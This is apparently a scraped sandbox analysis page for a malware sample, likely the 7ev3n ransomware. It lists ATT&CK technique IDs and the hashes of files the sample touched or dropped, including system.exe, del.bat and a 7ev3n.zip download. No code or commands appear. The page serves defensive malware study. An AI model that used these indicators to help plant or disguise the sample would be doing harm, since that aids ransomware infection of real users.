T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
048e739a7597187a1e5cbf0d0ebb2827

SHA1
40f3eec605f74ccfea6804fc0de52d39c330c91b

SHA256
f3f635902f4c370eccba8ca6d5fb80f2c92a94ac9da38d87adab0a292f015bef

SHA512
b1cd4d5bfa7f250320ad8fb9422596f405c8d42a4502d064371c0cd33c44ade21cc2242515c2eb38777357eea3ae9702dca7dbcad830dff6c59850ad08abee34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
83da9d6b268cc4b0e0e670bb4c99283e

SHA1
cb1e075df4ff0bc400dcb37a9ae292a0b5cdb7b1

SHA256
d9973bb612e29b87535282da4661633c9e1049229003155b7d544aa5fe68cdb3

SHA512
e8df48c0eddd762fa396f982646aec88fbfe39defcc97399a545a96abb12bda6934b21765b7a15d58c31001c8a627418d0d972410243523fdc30442742cc9a45

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
aaf8aeccb1ae8bf5cc33c6c385bc71e7

SHA1
47c11d412e161fa918a5a4a347bb412dd1cb7d1d

SHA256
3c271620503189ee9738db4a3f3bd591a79c0b39ba64e3c185054b300def5bb4

SHA512
bae019fcd19545f065f45e944d53e6255f606a125a67104d94fd6c9434084919d79e165b9d499c5ff69115e71effe84dc84946717b460dcebcc3fdd2f73b4d41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
8fc61ff74ef377360766ead6b280e490

SHA1
0c5d5bd38d737346f4af40368f3c2fd0aebdf1d2

SHA256
8a4ae3c8e7871ac281872f3e86dfb3453159f9f9f1fe5cece034f20a710f1884

SHA512
c8672987263d99bb7a147084e146c0d5a8a52de4dca9c40c745dcbde710146065ea1a2a6aa7568eb5246a5216fb8695b2943a1c769e23b42c5bc1bf57244ee74

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
135ab6eea47158d2ef4288bce7854e07

SHA1
789a8de82a202c675b9b74521aada6c8cbfcffab

SHA256
b5b215184ff8e246c586014359c5a3a571025e7b0f97ad56cf3155807f87c6b6

SHA512
8783109cd8d395f56734495420ab488a4149cc25e7ed7f67cb9710fd80e1aeca7ddfc79cf23a7941ca990c3a2cb06d2e414ef6b43f1e1ddcc6a45f7b8090250e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
c47bb2705e4c461e6d9b849f4ec641c5

SHA1
e7977a8f79b5a0a9450df6a4517385839c12363d

SHA256
e57b31ac06b06c36a7e41c62756171b894d40467e04de958da9915a6c9ad65ed

SHA512
6cb0dc393045bd95b3646f4b33c56d73f9f03fb8f7698cc6ca3fba47d3069f5f73b26bb0323bcb044fb66e8b1dcd15148e4ca17340dfa0a9e189288241847964

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
7680ba15ceedb61d73d12ab7cbe7234b

SHA1
5af59e502181962b6885ee25084a8ef8c40409bf

SHA256
4a176e503d90249d4f6034e37d0beebf442a6c2427333e915098cbafedb22ab3

SHA512
32833ed20b1e756300d74a914e576a1b9e131ff5d9573e8334c8e85c8e6db948b683122ea26c3870e8c8b75e93a4f9388ee50da59564820786834344598d0031

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cf13e4cc7b7c40d260859f75b415f74b

SHA1
634e1ee5f72c8be73395657c893869d4e80d288e

SHA256
a21cdb04fcdc9f9b6f88bb7a701ff1036aacb41704575646a6734584cae0c263

SHA512
abe067fe7037f543ebd26101cb4e4e1e46b99e6b87a9ca5a94ebb9fc450a20f3b6cceda022a8c0dfd88284ced675bd8e0f8f50316230f9088ce1ff5e83dfe843

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1d7837de0bc5b8e57fa50e37c6d539a4

SHA1
16489a0ff516d5cd8707002c5b693c64fa794dd9

SHA256
b0cf9da0bd4d47009ad2d33f64257f3431128e595be3196972b6fad33d1c8bcc

SHA512
005098058a48b3cda362b113e4d1d873b950966dd28170d63c41cbb7d56b1036838321313d3d3671cbc7bb97fd4aae42dfb8fd4641fbaa11714f25d67bcc615d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
63cd15c558c9a629053e18154b2a935c

SHA1
c67f1f82dfd3b77e744f5e1cf1ecdd8bb8ce257c

SHA256
1a9b848ef364ade291b5de6fd01fd9930813f4a34249c296a4fd6df0d9b57e94

SHA512
87cd6e95801c5cb700c688127756a49c8734a1f39ba91695dc6e30d37cb7ae90c3e5afc69f5f7afa3e889369f88219502d4a6cd88b1ffc1601e8e86acf9a302f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
30ee5d342e721be1d167b98a958b5442

SHA1
b61d783b8c01c3954143a3d1db29cfc13bdacf72

SHA256
5e3b6f8b8e44288ba277b7015a1b3982e181667d22155671ef4a5a0955b1882c

SHA512
ad1d2d882f9a7891b6c39d4424f69cad1e22da0a9cc49982e4aeaac47470945c19c36f84883468864ba792a5f06bd51a25c5fd39b56a77d92b07d36ee3783117

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
9ac75a4ac96c24eafdeab8b7dbd65e7d

SHA1
28d707e0fb4c99a31d9d74e117873b85887b6206

SHA256
61fee3a7a8c59c16bffb9b1faf3a98aaeeb4aa2852fc4b0a9c686cd9e83b1040

SHA512
36a1de4f074d90f494c604397ac2e6e816df76032fbd616054aba3bad889be3ff239a088214e28a84f3276d57aef6db1c1e7c7a034cf1195dc1ee222f27fb628

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
91e60bc2f0cc9da514a9f3028898edd8

SHA1
ebae06e38df3d07a0b0bf91542ab474f2c2114cf

SHA256
244635125a950382bb93c108752eddff7ec904d8151a47798a050f801c8898ef

SHA512
f5b4f7a722507b438d6174c287d3ca184ad2c387d68d896f038e76b71c315e5adb6dd781ce8f16b5fdb60bc907b0fa53fbf5d89252241b87bc0d8df241d89165

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ade38cf038ba34b585efcf16c8668e4a

SHA1
f181419a7aa9b0d1fce30a017b7f069da445b76e

SHA256
9a3584da92267182f167b751648488f87cdde3c0eef07362287e4d293a724b08

SHA512
67dcf7b7570169a1f7bdfaf4b0db45b1e4e9adb4d6590284aa5f5f23e4318fd03e8fa92631d3ce495445b994a7dc156c70f7fe8a6b3a94933f6be6cb58afd683

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
fdc26d322930bdeb2a76f86d9a6dfee4

SHA1
3b432978c4c95e69d58128c28c8497407f35de8e

SHA256
01740b80d68f757b31cefdf3518d109d382a35e7f0909fba2e5d7c9a88084b58

SHA512
a39b58e2f4ed3d5471148b40b09e729bf51aca7dfddc65d3c5ad4a09331f7ec433c9fc415a0f1325b2300aed59672199f6f9e3d1df595fdfb9eae09271cf229b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
abe8d0a6c7929d91ca5b9f07ac2d9957

SHA1
b6630e2c05cb03389a9e301209f69a1058467a3d

SHA256
d3b669db5fa8c9fceee5edab807f7eb3fcd2b09a481326ce7d768288c8af19f9

SHA512
398a99afc54532b7582115d0b2dd181e8a0a751ab3f2344b9a5bfc33882a75d0a89d51d273561860bcca4c817601a3de38e929219c5bef8bbb3d6e412324e593

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
e5e6f1ade9d157efe4567ba2a45c910e

SHA1
1e3057de12ed5644536fd4929877e063d556800e

SHA256
fda7e761cdfabd327b4cdf59a9b3cc6422519e3f50a010ed460d6b7c164bd9e8

SHA512
cdc52d5b74740a15a02f2579e5abd39869b3dca766aee9a24fefbb433aac9cee2e177b8209983c4c3cff078faf74669612190fb3e22ff29454c017bd48e649d8

Download Submit
C:\Users\Admin\AppData\Local\del.bat

Filesize
92B

MD5
ec326bbb3bccbdc24ecbca52d7727227

SHA1
6d230c114148c2c62d1ee91fcf6b9575194ebea2

SHA256
e430f2a59f3cdd5474ecbe58a9d3a2414813e84f3124ecbd4d9180802e7cc57a

SHA512
59768d77a6360d2bb7f161ccc747635516ee374fd158ddd6163802559cf02bd6843087f04c26f3471ba8472f8b2219564b6e998f705770105672db86747e5525

Download Submit
C:\Users\Admin\AppData\Local\system.exe

Filesize
315KB

MD5
9f8bc96c96d43ecb69f883388d228754

SHA1
61ed25a706afa2f6684bb4d64f69c5fb29d20953

SHA256
7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

SHA512
550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

Download Submit
C:\Users\Admin\Downloads\7ev3n.zip.crdownload

Filesize
139KB

MD5
c6f3d62c4fb57212172d358231e027bc

SHA1
11276d7a49093a51f04667975e718bb15bc1289b

SHA256
ea60123ec363610c8cfcd0ad5f0ab2832934af69a3c715020a09e6d907691d4c

SHA512
0f58acac541e6dece45949f4bee300e5bbb15ff1e60defe6b854ff4fb57579b18718b313bce425999d3f24319cfb3034cd05ebff0ecbd4c55ce42c7f59169b44

Download Submit
\??\pipe\crashpad_444_FVWTMVHQFPPFPYMS

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4456-456-0x00007FF69F3E0000-0x00007FF69F3F1000-memory.dmp

Filesize
68KB

Download
memory/4456-458-0x00007FF881CC0000-0x00007FF881D7E000-memory.dmp

Filesize
760KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads